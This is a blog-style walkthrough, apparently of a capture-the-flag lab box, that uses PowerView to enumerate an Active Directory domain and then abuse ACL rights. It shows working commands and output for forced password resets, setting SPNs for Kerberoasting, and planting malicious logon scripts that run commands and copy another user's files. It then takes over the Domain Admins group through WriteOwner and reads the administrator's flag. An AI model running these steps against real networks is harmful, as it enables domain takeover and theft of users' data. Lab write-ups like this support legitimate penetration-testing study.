Powerview Script usage for privilege escalation Link to heading
Powerview script can be for enumeration and privilege escalation.
The script can be downloaded from here.
I will explain few scenrios which i have used poweview for enumeration and privilege escalation. Most of times I will upload the file like this to windows( location C:\ProgramData)
Make sure to activate the script by using below command
Import-Module .\PowerView.ps1
Lets explore few enumeration command to understand the active directory domain.
Get-Netuser Link to heading
The AD there could be many users created , to explore the users and their rights on AD domian , “Get-Netuser”
*Evil-WinRM* PS C:\programdata> Get-Netuser
The same command can be used to filter specific username as well.
*Evil-WinRM* PS C:\programdata> Get-Netuser Oliver
The full output can be seen here for these commands.
To see the username only we can use this command :
Evil-WinRM* PS C:\programdata> Get-Netuser | select cn
cn
--
Administrator
Guest
krbtgt
Olivar Ava
Smith William
maria garcia
From this you can use the below command again to enumerate each usernames.
Other useful commands:
To see the last time when password is changed for each user
Get-UserProperty -Properties pwdlastset
Find any spefic words like “pass” or “build” in usernamename property filelds to identify the password hints or built in accounts:
Find-UserField -SearchField Description -SearchTerm "pass"
Find-UserField -SearchField Description -SearchTerm "built"
Below commands can be used to identify the weak usernames which can lead to privilege access.
Invoke-UserHunter
Invoke-UserHunter -CheckAccess
Get-NetDomain Link to heading
To see the details of domain, we can use this. Lets you login to a server and you need to know the details of Active directory domain which it is part of ( may it may be local in some cases) you can use below commands.
Evil-WinRM* PS C:\programdata> Get-NetDomain
Forest : object.local
DomainControllers : {jenkins.object.local}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : jenkins.object.local
RidRoleOwner : jenkins.object.local
InfrastructureRoleOwner : jenkins.object.local
Name : object.local
Get-NetDomainController Link to heading
Thiscommand get the information of the server device instead of the domain related information we checked just now.
This command gives you the server details where Active directory server services are configured
Get-NetDomainController
Forest : object.local
CurrentTime : 7/19/2022 12:16:42 AM
HighestCommittedUsn : 168579
OSVersion : Windows Server 2019 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : object.local
IPAddress : fe80::3844:8996:fe12:afee%12
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : jenkins.object.local
Partitions : {DC=object,DC=local, CN=Configuration,DC=object,DC=local, CN=Schema,CN=Configuration,DC=object,DC=local, DC=DomainDnsZones,DC=object,DC=local...}
Get-NetComputer Link to heading
This command can be used to extract the information from any local machine.If the Active directory service locally runing on that machine, you will get Active directory information as well.
PS C:\programdata> Get-NetComputer
pwdlastset : 7/17/2022 5:07:06 PM
logoncount : 235
msds-generationid : {87, 236, 75, 39...}
serverreferencebl : CN=JENKINS,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=object,DC=local
badpasswordtime : 12/31/1600 4:00:00 PM
msds-additionaldnshostname : {WIN-LR8T2EF8VHM, JENKINS}
distinguishedname : CN=JENKINS,OU=Domain Controllers,DC=object,DC=local
objectclass : {top, person, organizationalPerson, user...}
displayname : JENKINS$
lastlogontimestamp : 7/17/2022 5:07:29 PM
name : JENKINS
primarygroupid : 516
objectsid : S-1-5-21-4088429403-1159899800-2753317549-1000
samaccountname : JENKINS$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
whenchanged : 7/18/2022 12:07:29 AM
accountexpires : NEVER
cn : JENKINS
operatingsystem : Windows Server 2019 Standard
instancetype : 4
msdfsr-computerreferencebl : CN=WIN-LR8T2EF8VHM,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=object,DC=local
objectguid : f11ae853-8e36-4225-b5fe-7b882055f330
operatingsystemversion : 10.0 (17763)
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=object,DC=local
dscorepropagationdata : {10/21/2021 9:48:46 AM, 10/21/2021 9:42:43 AM, 10/21/2021 4:25:27 AM, 1/1/1601 6:16:33 PM}
serviceprincipalname : {ldap/JENKINS/ForestDnsZones.object.local, ldap/jenkins.object.local/ForestDnsZones.object.local, ldap/WIN-LR8T2EF8VHM/ForestDnsZones.object.local, ldap/WIN-LR8T2EF8VHM/DomainDnsZones.object.local...}
usncreated : 12293
lastlogon : 7/18/2022 5:07:01 PM
badpwdcount : 0
useraccountcontrol : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
whencreated : 10/21/2021 4:25:27 AM
countrycode : 0
iscriticalsystemobject : True
msds-supportedencryptiontypes : 28
usnchanged : 167991
ridsetreferences : CN=RID Set,CN=JENKINS,OU=Domain Controllers,DC=object,DC=local
dnshostname : jenkins.object.local
More options related to this command:
Get-NetComputer -FullData
Get-NetComputer -Ping
Get-NetComputer -Operatingsystem "Windows Server 2019 Standard"
Get-UserProperty Link to heading
This can be used to identify the users with privileges which can be exploited.
Commands
Get-UserProperty
Get-UserProperty -Properties lastlogon
Get-NetForest & Get-NetForestcatalog Link to heading
This can give information about AD forest and mutiple forest which it is part of.
Evil-WinRM* PS C:\programdata> Get-NetForest
RootDomainSid : S-1-5-21-4088429403-1159899800-2753317549
Name : object.local
Sites : {Default-First-Site-Name}
Domains : {object.local}
GlobalCatalogs : {jenkins.object.local}
ApplicationPartitions : {DC=DomainDnsZones,DC=object,DC=local, DC=ForestDnsZones,DC=object,DC=local}
ForestModeLevel : 7
ForestMode : Unknown
RootDomain : object.local
Schema : CN=Schema,CN=Configuration,DC=object,DC=local
SchemaRoleOwner : jenkins.object.local
NamingRoleOwner : jenkins.object.local
*Evil-WinRM* PS C:\programdata> Get-NetForestcatalog
Forest : object.local
CurrentTime : 7/20/2022 12:16:43 AM
HighestCommittedUsn : 168041
OSVersion : Windows Server 2019 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : object.local
IPAddress : fe80::3070:ba8f:4837:6896%12
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : jenkins.object.local
Partitions : {DC=object,DC=local, CN=Configuration,DC=object,DC=local, CN=Schema,CN=Configuration,DC=object,DC=local, DC=DomainDnsZones,DC=object,DC=local...}
Get-NetForestdomain Link to heading
This can give the same domain information which we saw earlier commands
Evil-WinRM* PS C:\programdata> Get-NetForestdomain
Forest : object.local
DomainControllers : {jenkins.object.local}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : jenkins.object.local
RidRoleOwner : jenkins.object.local
InfrastructureRoleOwner : jenkins.object.local
Name : object.local
Get-Netloggedon Link to heading
To see the current logged on users we can use this command ( only if you have admin rights)
Get-DomainComputer | Get-NetLoggedon
Get-NetLoggedon -ComputerName JENKINS
Get-Domainpolicy Link to heading
This can be used to extract the current domain policy.
for ex: password requirements, kereberospolicy
Get-DomainPolicy
Unicode : @{Unicode=yes}
SystemAccess : @{MinimumPasswordAge=1; MaximumPasswordAge=42; MinimumPasswordLength=7; PasswordComplexity=1; PasswordHistorySize=24; LockoutBadCount=0; RequireLogonToChangePassword=0; ForceLogoffWhenHourExpire=0; ClearTextPassword=0;
LSAAnonymousNameLookup=0}
KerberosPolicy : @{MaxTicketAge=10; MaxRenewAge=7; MaxServiceAge=600; MaxClockSkew=5; TicketValidateClient=1}
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.Object[]}
Version : @{signature="$CHICAGO$"; Revision=1}
Path : \\object.local\sysvol\object.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
GPOName : {31B2F340-016D-11D2-945F-00C04FB984F9}
GPODisplayName : Default Domain Policy
To see in more readable way for each policy you can use like this
*Evil-WinRM* PS C:\programdata> (Get-DomainPolicy)."KerberosPolicy"
MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1
Get-NetOU Link to heading
This helps to understand the “organisational unit"under the Active directory domain. OU means small containers which is defined under Active directory domain( like groups,users,computers)
This helps the domain admin to push the policies to speciifc users,computers or groups.
Evil-WinRM* PS C:\programdata> Get-NetOU
usncreated : 5804
systemflags : -1946157056
iscriticalsystemobject : True
gplink : [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=object,DC=local;0]
whenchanged : 10/21/2021 4:24:29 AM
objectclass : {top, organizationalUnit}
showinadvancedviewonly : False
usnchanged : 5804
dscorepropagationdata : {10/21/2021 9:48:46 AM, 10/21/2021 9:42:43 AM, 10/21/2021 4:25:27 AM, 1/1/1601 6:16:33 PM}
name : Domain Controllers
description : Default container for domain controllers
distinguishedname : OU=Domain Controllers,DC=object,DC=local
ou : Domain Controllers
whencreated : 10/21/2021 4:24:29 AM
instancetype : 4
objectguid : a66b3a78-610a-4958-8e3d-ae5afbcac112
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=object,DC=local
Get-Netgroup Link to heading
It can be used to get the information of groups. Output is found here.
To specifc informations like admin users or specific groups where a user belongs the command can be used with some filters.
*Evil-WinRM* PS C:\programdata> Get-NetGroup *admin*
*Evil-WinRM* PS C:\programdata> Get-NetGroup -Username maria
usncreated : 12348
grouptype : GLOBAL_SCOPE, SECURITY
samaccounttype : GROUP_OBJECT
samaccountname : Domain Users
whenchanged : 10/21/2021 4:25:27 AM
objectsid : S-1-5-21-4088429403-1159899800-2753317549-513
objectclass : {top, group}
cn : Domain Users
usnchanged : 12350
dscorepropagationdata : {10/21/2021 9:48:46 AM, 10/21/2021 9:42:43 AM, 10/21/2021 9:27:59 AM, 10/21/2021 9:27:20 AM...}
memberof : CN=Users,CN=Builtin,DC=object,DC=local
iscriticalsystemobject : True
description : All domain users
distinguishedname : CN=Domain Users,CN=Users,DC=object,DC=local
name : Domain Users
whencreated : 10/21/2021 4:25:27 AM
instancetype : 4
objectguid : 69af56a2-9042-43e3-8142-5b2be2963d84
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=object,DC=local
Other useful filters:
Get-NetGroup -domain object.local
Get-NetGroup -FullData
Privilege escalation using the Active directory rights/permission Link to heading
Once we find the user is having “GenericAll rights” it can be used to be chnage the password of another user:
Get-ObjectAcl -SamAccountName Oliver -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}
AceType : AccessAllowed
ObjectDN : CN=Olivar Ava,CN=Users,DC=object,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1103
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-4088429403-1159899800-2753317549-512
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Olivar Ava,CN=Users,DC=object,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1103
The password chnage can be tried like this for another user:
whoami; net user smith Password#123
object\oliver
net.exe : System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
It did not work due to some permission issues. Next method to chnage the password like this:
PS C:\programdata> $rchitect = ConvertTo-SecureString 'Rch1tect' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity smith -AccountPassword $rchitect
Kerberoasting Link to heading
Some user have “WriteProperty” permission when we use the same command as before.
Get-ObjectAcl -SamAccountName smith -ResolveGUIDs | ? {$_.ActiveDirectoryR
ights}
AceQualifier : AccessAllowed
ObjectDN : CN=Smith William,CN=Users,DC=object,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Web-Information
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1104
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
Even i try changing the password with above methods it did not work.So I am going to use kerberoasting method to chnage the password of next user.For this we need to set SPN. With this permission we can set SPN for other user without knowing their password.I am going to set SPN “nonexistent/rchitect” for user maria by logging is as user “smith” without knowing the password. This was prossible due the activie directory permission “writeproperty” for user “smith”
*Evil-WinRM* PS C:\Programdata> Set-DomainObject -Identity maria -SET @{serviceprincipalname='nonexistent/rchitect'}
*Evil-WinRM* PS C:\Programdata> Get-DomainUser maria | Select serviceprincipalname
serviceprincipalname
--------------------
nonexistent/rchitect
This SPN setting can not be used for Kerberoasting, it has to be a specific format which microsoft receommends. Refer [here](Name Formats for Unique SPNs - Win32 apps | Microsoft Docs) for valid format of SPN.
The SPN formart should be as below format:
<service class>/<host>:<port>/<service name>
setspn -a MSSQLSvc/object.local:1433 object.local\maria
Checking domain DC=object,DC=local
Registering ServicePrincipalNames for CN=maria garcia,CN=Users,DC=object,DC=local
MSSQLSvc/object.local:1433
Updated object
*Evil-WinRM* PS C:\Programdata> Get-DomainUser maria | Select serviceprincipalname
serviceprincipalname
--------------------
{MSSQLSvc/object.local:1433, newSvc/object.local:1838, nonexistent/rchitect}
Now we can assign a credentils.I tried and amy be due the machine i tried seems broken. So the password chnage did not work. However the procedure remains same for below for other servers if you want to try:
*Evil-WinRM* PS C:\Users\smith\Documents> $pass = ConvertTo-SecureString 'rchitect2a!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\smith\Documents> $cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $pass)
*Evil-WinRM* PS C:\Users\smith\Documents> Get-DomainSPNTicket -SPN "MSSQLSvc/object.local:1433" -Credential $Cred
The term 'Get-DomainSPNTicket' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Get-DomainSPNTicket -SPN "MSSQLSvc/object.local:1433" -Credential $Cr ...
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Get-DomainSPNTicket:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
Logonscript Link to heading
As per t[his ](Abusing Active Directory ACLs/ACEs - HackTricks)works only when user logs into the server. In my case, i dont have option to test this. So i created a ping script.
*Evil-WinRM* PS C:\ProgramData> echo "ping 10.10.14.4" > ping.ps1
*Evil-WinRM* PS C:\ProgramData> Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\ping.ps1"}
As soon i hit the last command i can see continous icmp happeing on target machine.
tcpdump at traget machine:
sudo tcpdump -ni tun0 icmp
[sudo] password for rocky:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
05:16:53.665283 IP 10.129.67.198 > 10.10.14.4: ICMP echo request, id 1, seq 5785, length 40
05:16:53.665325 IP 10.10.14.4 > 10.129.67.198: ICMP echo reply, id 1, seq 5785, length 40
05:16:54.674527 IP 10.129.67.198 > 10.10.14.4: ICMP echo request, id 1, seq 5788, length 40
05:16:54.674550 IP 10.10.14.4 > 10.129.67.198: ICMP echo reply, id 1, seq 5788, length 40
05:16:55.691912 IP 10.129.67.198 > 10.10.14.4: ICMP echo request, id 1, seq 5791, length 40
05:16:55.691939 IP 10.10.14.4 > 10.129.67.198: ICMP echo reply, id 1, seq 5791, length 40
05:16:56.712447 IP 10.129.67.198 > 10.10.14.4: ICMP echo request, id 1, seq 5794, length 40
05:16:56.712490 IP 10.10.14.4 > 10.129.67.198: ICMP echo reply, id 1, seq 5794, length 40
05:16:57.828371 IP 10.129.67.198 > 10.10.14.4: ICMP echo request, id 1, seq 5798, length 40
Now chnage the logon script to enumerate more sensitive infirmation other users.
To View the home directory contents of other users with logon scripts:
Evil-WinRM* PS C:\ProgramData> echo "ls \users\maria\ > \programdata\out" > cmd.ps1
*Evil-WinRM* PS C:\ProgramData> Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\cmd.ps1"}
*Evil-WinRM* PS C:\ProgramData> ls
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 7/29/2022 2:28 AM 76 cmd.ps1
-a---- 7/29/2022 2:29 AM 3476 out
-a---- 7/29/2022 2:15 AM 36 ping.ps1
-a---- 7/29/2022 1:35 AM 770279 PowerView.ps1
*Evil-WinRM* PS C:\ProgramData> cat out
Directory: C:\users\maria
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/22/2021 3:54 AM 3D Objects
d-r--- 10/22/2021 3:54 AM Contacts
d-r--- 10/25/2021 3:47 AM Desktop
d-r--- 10/25/2021 10:07 PM Documents
d-r--- 10/22/2021 3:54 AM Downloads
d-r--- 10/22/2021 3:54 AM Favorites
d-r--- 10/22/2021 3:54 AM Links
d-r--- 10/22/2021 3:54 AM Music
d-r--- 10/22/2021 3:54 AM Pictures
d-r--- 10/22/2021 3:54 AM Saved Games
d-r--- 10/22/2021 3:54 AM Searches
d-r--- 10/22/2021 3:54 AM Videos
We can even copy the folder/files from this users to the directory we want. I am copying a file from user Desktop folder to specific folder which i already have access.
Evil-WinRM* PS C:\ProgramData> echo "copy \users\maria\desktop\Engines.xls \programdata\" > cmd.ps1
*Evil-WinRM* PS C:\ProgramData> ls
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 7/29/2022 1:32 AM 108 cmd.ps1
-a---- 10/26/2021 8:13 AM 6144 Engines.xls
Changing the group Owner with Previlege “WriteOwner” Link to heading
In this case the user has below privileges especially “WriteOnwer”
AceType : AccessAllowed
ObjectDN : CN=maria garcia,CN=Users,DC=object,DC=local
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1106
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit, Inherited
above is the filtered output of this command “Get-ObjectAcl -SamAccountName Maria -ResolveGUIDs | ? {$_.ActiveDirectoryRights}”
With this permission, i can make user “maria” as domain owner of admin group and assign full permissions like this:
*Evil-WinRM* PS C:\ProgramData> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'
*Evil-WinRM* PS C:\ProgramData> Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
*Evil-WinRM* PS C:\ProgramData> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
We can see group membership here
*Evil-WinRM* PS C:\ProgramData> net user maria
User name maria
Full Name maria garcia
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/21/2021 9:16:32 PM
Password expires Never
Password changeable 10/22/2021 9:16:32 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script C:\\programdata\\cmd.ps1
User profile
Home directory
Last logon 7/29/2022 1:32:52 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Admins *Domain Users
after login and logout the group details
S C:\Users\maria\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
OBJECT\Domain Admins Group S-1-5-21-4088429403-1159899800-2753317549-512 Mandatory group, Enabled by default, Enabled group
OBJECT\Denied RODC Password Replication Group Alias S-1-5-21-4088429403-1159899800-2753317549-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
We are having the full permission to Administrator user directories
*Evil-WinRM* PS C:\users\Administrator\Desktop> type root.txt
bde8